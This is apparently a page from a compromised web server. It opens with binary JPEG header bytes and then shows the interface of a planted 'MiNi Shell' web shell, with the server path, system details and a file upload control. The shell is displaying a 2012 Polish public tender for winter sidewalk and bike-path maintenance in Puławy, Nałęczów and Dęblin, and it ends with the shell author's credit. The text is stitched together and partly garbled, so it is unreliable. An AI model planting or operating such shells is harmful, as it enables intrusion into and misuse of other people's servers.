JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120827/184609-N-2012.html

<p class="kh_header"><b>Puławy: Usługi polegające na zimowym utrzymaniu chodników, ścieżek rowerowych, wysp rozdzielających oraz azyli dla pieszych położonych wzdłuż dróg wojewódzkich na terenie miast: Puławy, Nałęczów i Dęblin</b><br>
<b>Numer ogłoszenia: 184609 - 2012; data zamieszczenia: 27.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach , ul. Składowa 1A, 24-100 Puławy, woj. lubelskie, tel. 081 8863163, 8864103, faks 081 8863163.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi polegające na zimowym utrzymaniu chodników, ścieżek rowerowych, wysp rozdzielających oraz azyli dla pieszych położonych wzdłuż dróg wojewódzkich na terenie miast: Puławy, Nałęczów i Dęblin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres prac obejmuje mechaniczne i ręczne odśnieżanie oraz zwalczanie śliskości zimowej nawierzchni chodników, ścieżek rowerowych, wysp rozdzielających oraz azyli dla pieszych na całej szerokości przy użyciu materiałów uszorstniających (piasek), z uwzględnieniem odcinków stanowiących dojścia do przejść dla pieszych na terenie:
a. Zadanie nr 1 - Miasto Puławy :   
- Chodniki i ścieżki rowerowe - 18 421,00 mb; 38 127,00 m2;
- Wyspy rozdzielające i azyle dla pieszych - 05 209,00 m2; na łącznej powierzchni - 43 336,00 m2,
b. Zadanie nr 2 - Miasto Nałęczów :
- Chodniki - 10 498,00 mb; 16 652,00 m2
c. Zadanie nr 3 - Miasto Dęblin :
- Chodniki i ścieżki rowerowe - 06 281,00 mb; 14 717,00 m2
2. Szczegółowy wykaz odcinków chodników, ścieżek rowerowych, wysp rozdzielających i azyli dla pieszych zawiera załącznik I Wykaz i lokalizacja chodników, ścieżek rowerowych, wysp rozdzielających oraz azyli dla pieszych, objętych zimowym utrzymaniem na terenie miast: Puławy, Nałęczów i Dęblin.
3. Maksymalna ilość dni prowadzenia akcji - 150.
4. Zamawiający, w zależności od warunków atmosferycznych, zastrzega sobie prawo zmniejszenia zakresu usług poprzez zmniejszenie ilości dni ich realizacji. 
5. Do obowiązków Wykonawcy należeć będzie :
a. Odśnieżanie (mechaniczne i ręczne w miejscach niedostępnych dla sprzętu) chodników, ścieżek rowerowych, wysp rozdzielających oraz azyli dla pieszych w taki sposób,  aby warstwa pozostawionego śniegu nie przekraczała 2-3 cm, a także, w przypadku m. Puławy 2-krotny wywóz śniegu pochodzącego w szczególności z wysp rozdzielających i azyli dla pieszych na terenie Miasteczka Holenderskiego. 
b. Równomierne posypywanie piaskiem odśnieżonych powierzchni. Niedopuszczalne jest rozsypywanie piasku zbrylonego oraz występowanie nieciągłości w posypywaniu. 
c. Wykonywanie czynności opisanych w pkt. a i b w ciągu 2 godzin od momentu ustania opadów śniegu. Po tym czasie na chodnikach winna być utrzymywana równomierna cienka warstwa piasku, zapobiegająca śliskości zimowej. 
d. Niezwłoczne przystępowanie w szczególności w godzinach 5oo - 7oo i 14oo - 16oo do posypywania nawierzchni w przypadku wystąpienia śliskości zimowej lub uzasadnionego podejrzenia co do możliwości jej wystąpienia niezależnie od opadów. 
e. Zabezpieczenie i utrzymanie w gotowości sprzętu i maszyn wraz z obsługą przewidzianych do realizacji zamówienia.
f. Zapewnienie we własnym zakresie obsługi naprawczo - remontowej sprzętu przewidzianego do świadczenia usług.
g. Zabezpieczenie we własnym zakresie materiałów do zwalczania śliskości. 
h. Załadunek materiałów własnym sprzętem i na swój koszt.
i. Niezwłoczne przekazywanie upoważnionym pracownikom Zamawiającego, za pośrednictwem osób obsługujących pojazdy i sprzęt, informacji o aktualnym stanie chodników, ścieżek rowerowych, wysp rozdzielających oraz azyli dla pieszych w czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach oraz zagrożeniach spowodowanych warunkami atmosferycznymi.    
6. Warunki realizacji zamówienia: 
a. Decyzję o rozpoczęciu i zakończeniu sezonu wykonywania usług objętych zamówieniem podejmować będzie Kierownik Rejonu Dróg Wojewódzkich w Puławach. 
b. Zamawiający zastrzega sobie prawo do czasowego zawieszenia wykonywania usług bez prawa do wynagrodzenia w tym okresie. 
c. Informacja o czasowym zawieszeniu usług przekazywana będzie w formie faksu lub telefonicznie i potwierdzona pisemnie. 
d. Przerwanie wykonywania usług następuje w dniu następnym po dniu, w którym Wykonawca otrzyma wiadomość o czasowym zawieszeniu. 
e. Czasowe zawieszenie usług nie może nastąpić na okres krótszy niż 3 dni.
f. Wykonawca zobowiązany jest wznowić wykonywanie usług po 2 godzinach od momentu powiadomienia o odwołaniu czasowego zawieszenia. 
7. Warunki zapłaty: 
a. Fakturowanie wykonanych usług będzie odbywało się nie częściej niż raz z miesiącu.
b. Podstawą wyliczenia wartości fakturowanych usług będzie cena jednostkowa - stawka dziennego ryczałtu (zgodnie z ofertą), uwzględniającego zarówno akcję czynną jak i bierną oraz ilość dni świadczenia usług (zarówno czynne jak i bierne).
c. Zamówienie będzie realizowane maksymalnie do cen umownych - zgodnie z cenami wybranych Wykonawców - za wykonanie poszczególnych zadań.     
8. Zamawiający dopuszcza składanie ofert częściowych, tj. ofert na świadczenie usług na poszczególne zadania, zgodnie z powyższym opisem zadań.   
Szacunkowa wartość zamówienia wynosi: 164 305,20 zł netto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału polegający na posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie spełniony jeżeli Wykonawca w formie pisemnej, oświadczy, że spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału polegający na posiadaniu wiedzy i doświadczenia zostanie spełniony jeżeli Wykonawca w formie pisemnej, oświadczy, że spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien dysponować jednostkami sprzętu i środkami transportu wymienionymi poniżej:
1. Zadanie nr 1: 
a. Jednostka transportowa (np. ciągnik) z posypywarką piasku i pługiem o wymiarach umożliwiających pracę na ciągach chodnikowych - 1 szt.,
b. Ciągnik z przyczepą lub samochód samowyładowczy o ładowności powyżej 5 ton - 1 szt.,
c. Narzędzia ręczne (szufle, miotły, itp.) - dowolna
2. Zadanie nr 2: 
a. Jednostka transportowa (np. ciągnik) z posypywarką piasku i pługiem o wymiarach umożliwiających pracę na ciągach chodnikowych - 1 szt.,
b. Narzędzia ręczne (szufle, miotły, itp.) - dowolna
3. Zadanie nr 3:
a. Jednostka transportowa (np. ciągnik) z posypywarką piasku i pługiem o wymiarach umożliwiających pracę na ciągach chodnikowych - 1 szt.,
b. Narzędzia ręczne (szufle, miotły, itp.) - dowolna</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien dysponować minimum 4 osobami przewidzianymi do ręcznego odśnieżania i usuwania oblodzeń (z wyłączeniem osób będących operatorami sprzętu).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału polegający na znajdowaniu się w sytuacji ekonomicznej i finansowej, pozwalającej na realizację zamówienia zostanie spełniony, jeżeli Wykonawca w formie pisemnej oświadczy, że spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta przetargowa (z ceną netto i podatkiem VAT) (wzór - zał. A) wraz z załączonym Formularzem cenowym (wzór - zał. A1).
2) Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić Podwykonawcy (wzór - zał. G).
3) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych. 
4) W przypadku podpisania oferty i innych dokumentów przez osobę/y która/e nie są wymienione w odpisie z właściwego rejestru, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/y podpisującą/e ofertę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, polegających na:
1. Zmianie wynagrodzenia w przypadku, gdy zmianie ulegnie stawka podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Puławach, ul. Składowa 1a, 24-100 Puławy, pok. nr 11 (cena 6,00 zł) lub pocztą elektroniczną po wcześniejszym wysłaniu zamówienia na adres: rdw.pulawy@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2012 godzina 08:00, miejsce: Rejon Dróg Wojewódzkich w Puławach, ul. Składowa 1a, 24-100 Puławy, pok. nr 12, otwarcie ofert nastąpi 05.09.2012 r., o godz. 8:30 w pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr 81 886 41 03, 886 31 63 lub drogą elektroniczną na adres: rdw.pulawy@zdw.lublin.pl .
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron, na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z Wykonawcami:
1. W sprawach technicznych - inż. Tomasz Kwiatkowski, tel. 81 886 31 63,
2. W sprawach formalno - prawnych, związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Artur Wiak - Sekcja techniczna, Tel. 81 886 31 63.
UWAGA!
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w innych sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem (81 886 41 03) lub pocztą elektroniczną na adres: rdw.pulawy@zdw.lublin.pl , zawierającej podstawowe dane firmy (nazwa adres nr telefonu i faksu, adres poczty elektronicznej). Wykonawcy którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia zwołaniu przez Zamawiającego zebrania wszystkich Wykonawców przedłużeniu terminu składania ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: miasto Puławy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje mechaniczne i ręczne odśnieżanie oraz zwalczanie śliskości zimowej nawierzchni chodników, ścieżek rowerowych, wysp rozdzielających oraz azyli dla pieszych na całej szerokości przy użyciu materiałów uszorstniających (piasek), z uwzględnieniem odcinków stanowiących dojścia do przejść dla pieszych na terenie miasta Puławy, w tym :   
- Chodniki i ścieżki rowerowe - 18 421,00 mb; 38 127,00 m2;
- Wyspy rozdzielające i azyle dla pieszych - 05 209,00 m2;  
na łącznej powierzchni	- 43 336,00 m2.
Szacunkowa wartość zadania wynosi: 104 006,40 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: miasto Nałęczów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje mechaniczne i ręczne odśnieżanie oraz zwalczanie śliskości zimowej nawierzchni chodników na całej szerokości przy użyciu materiałów uszorstniających (piasek), z uwzględnieniem odcinków stanowiących dojścia do przejść dla pieszych na terenie miasta Nałęczów, w tym :
- Chodniki - 10 498,00 mb; 16 652,00 m2.
Szacunkowa wartość zadania wynosi: 24 978,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3: miasto Dęblin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje mechaniczne i ręczne odśnieżanie oraz zwalczanie śliskości zimowej nawierzchni chodników i ścieżek rowerowych na całej szerokości przy użyciu materiałów uszorstniających (piasek), z uwzględnieniem odcinków stanowiących dojścia do przejść dla pieszych na terenie miasta Dęblin, w tym :
- Chodniki i ścieżki rowerowe - 06 281,00 mb; 14 717,00 m2.
Szacunkowa wartość zadania wynosi: 35 320,80 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com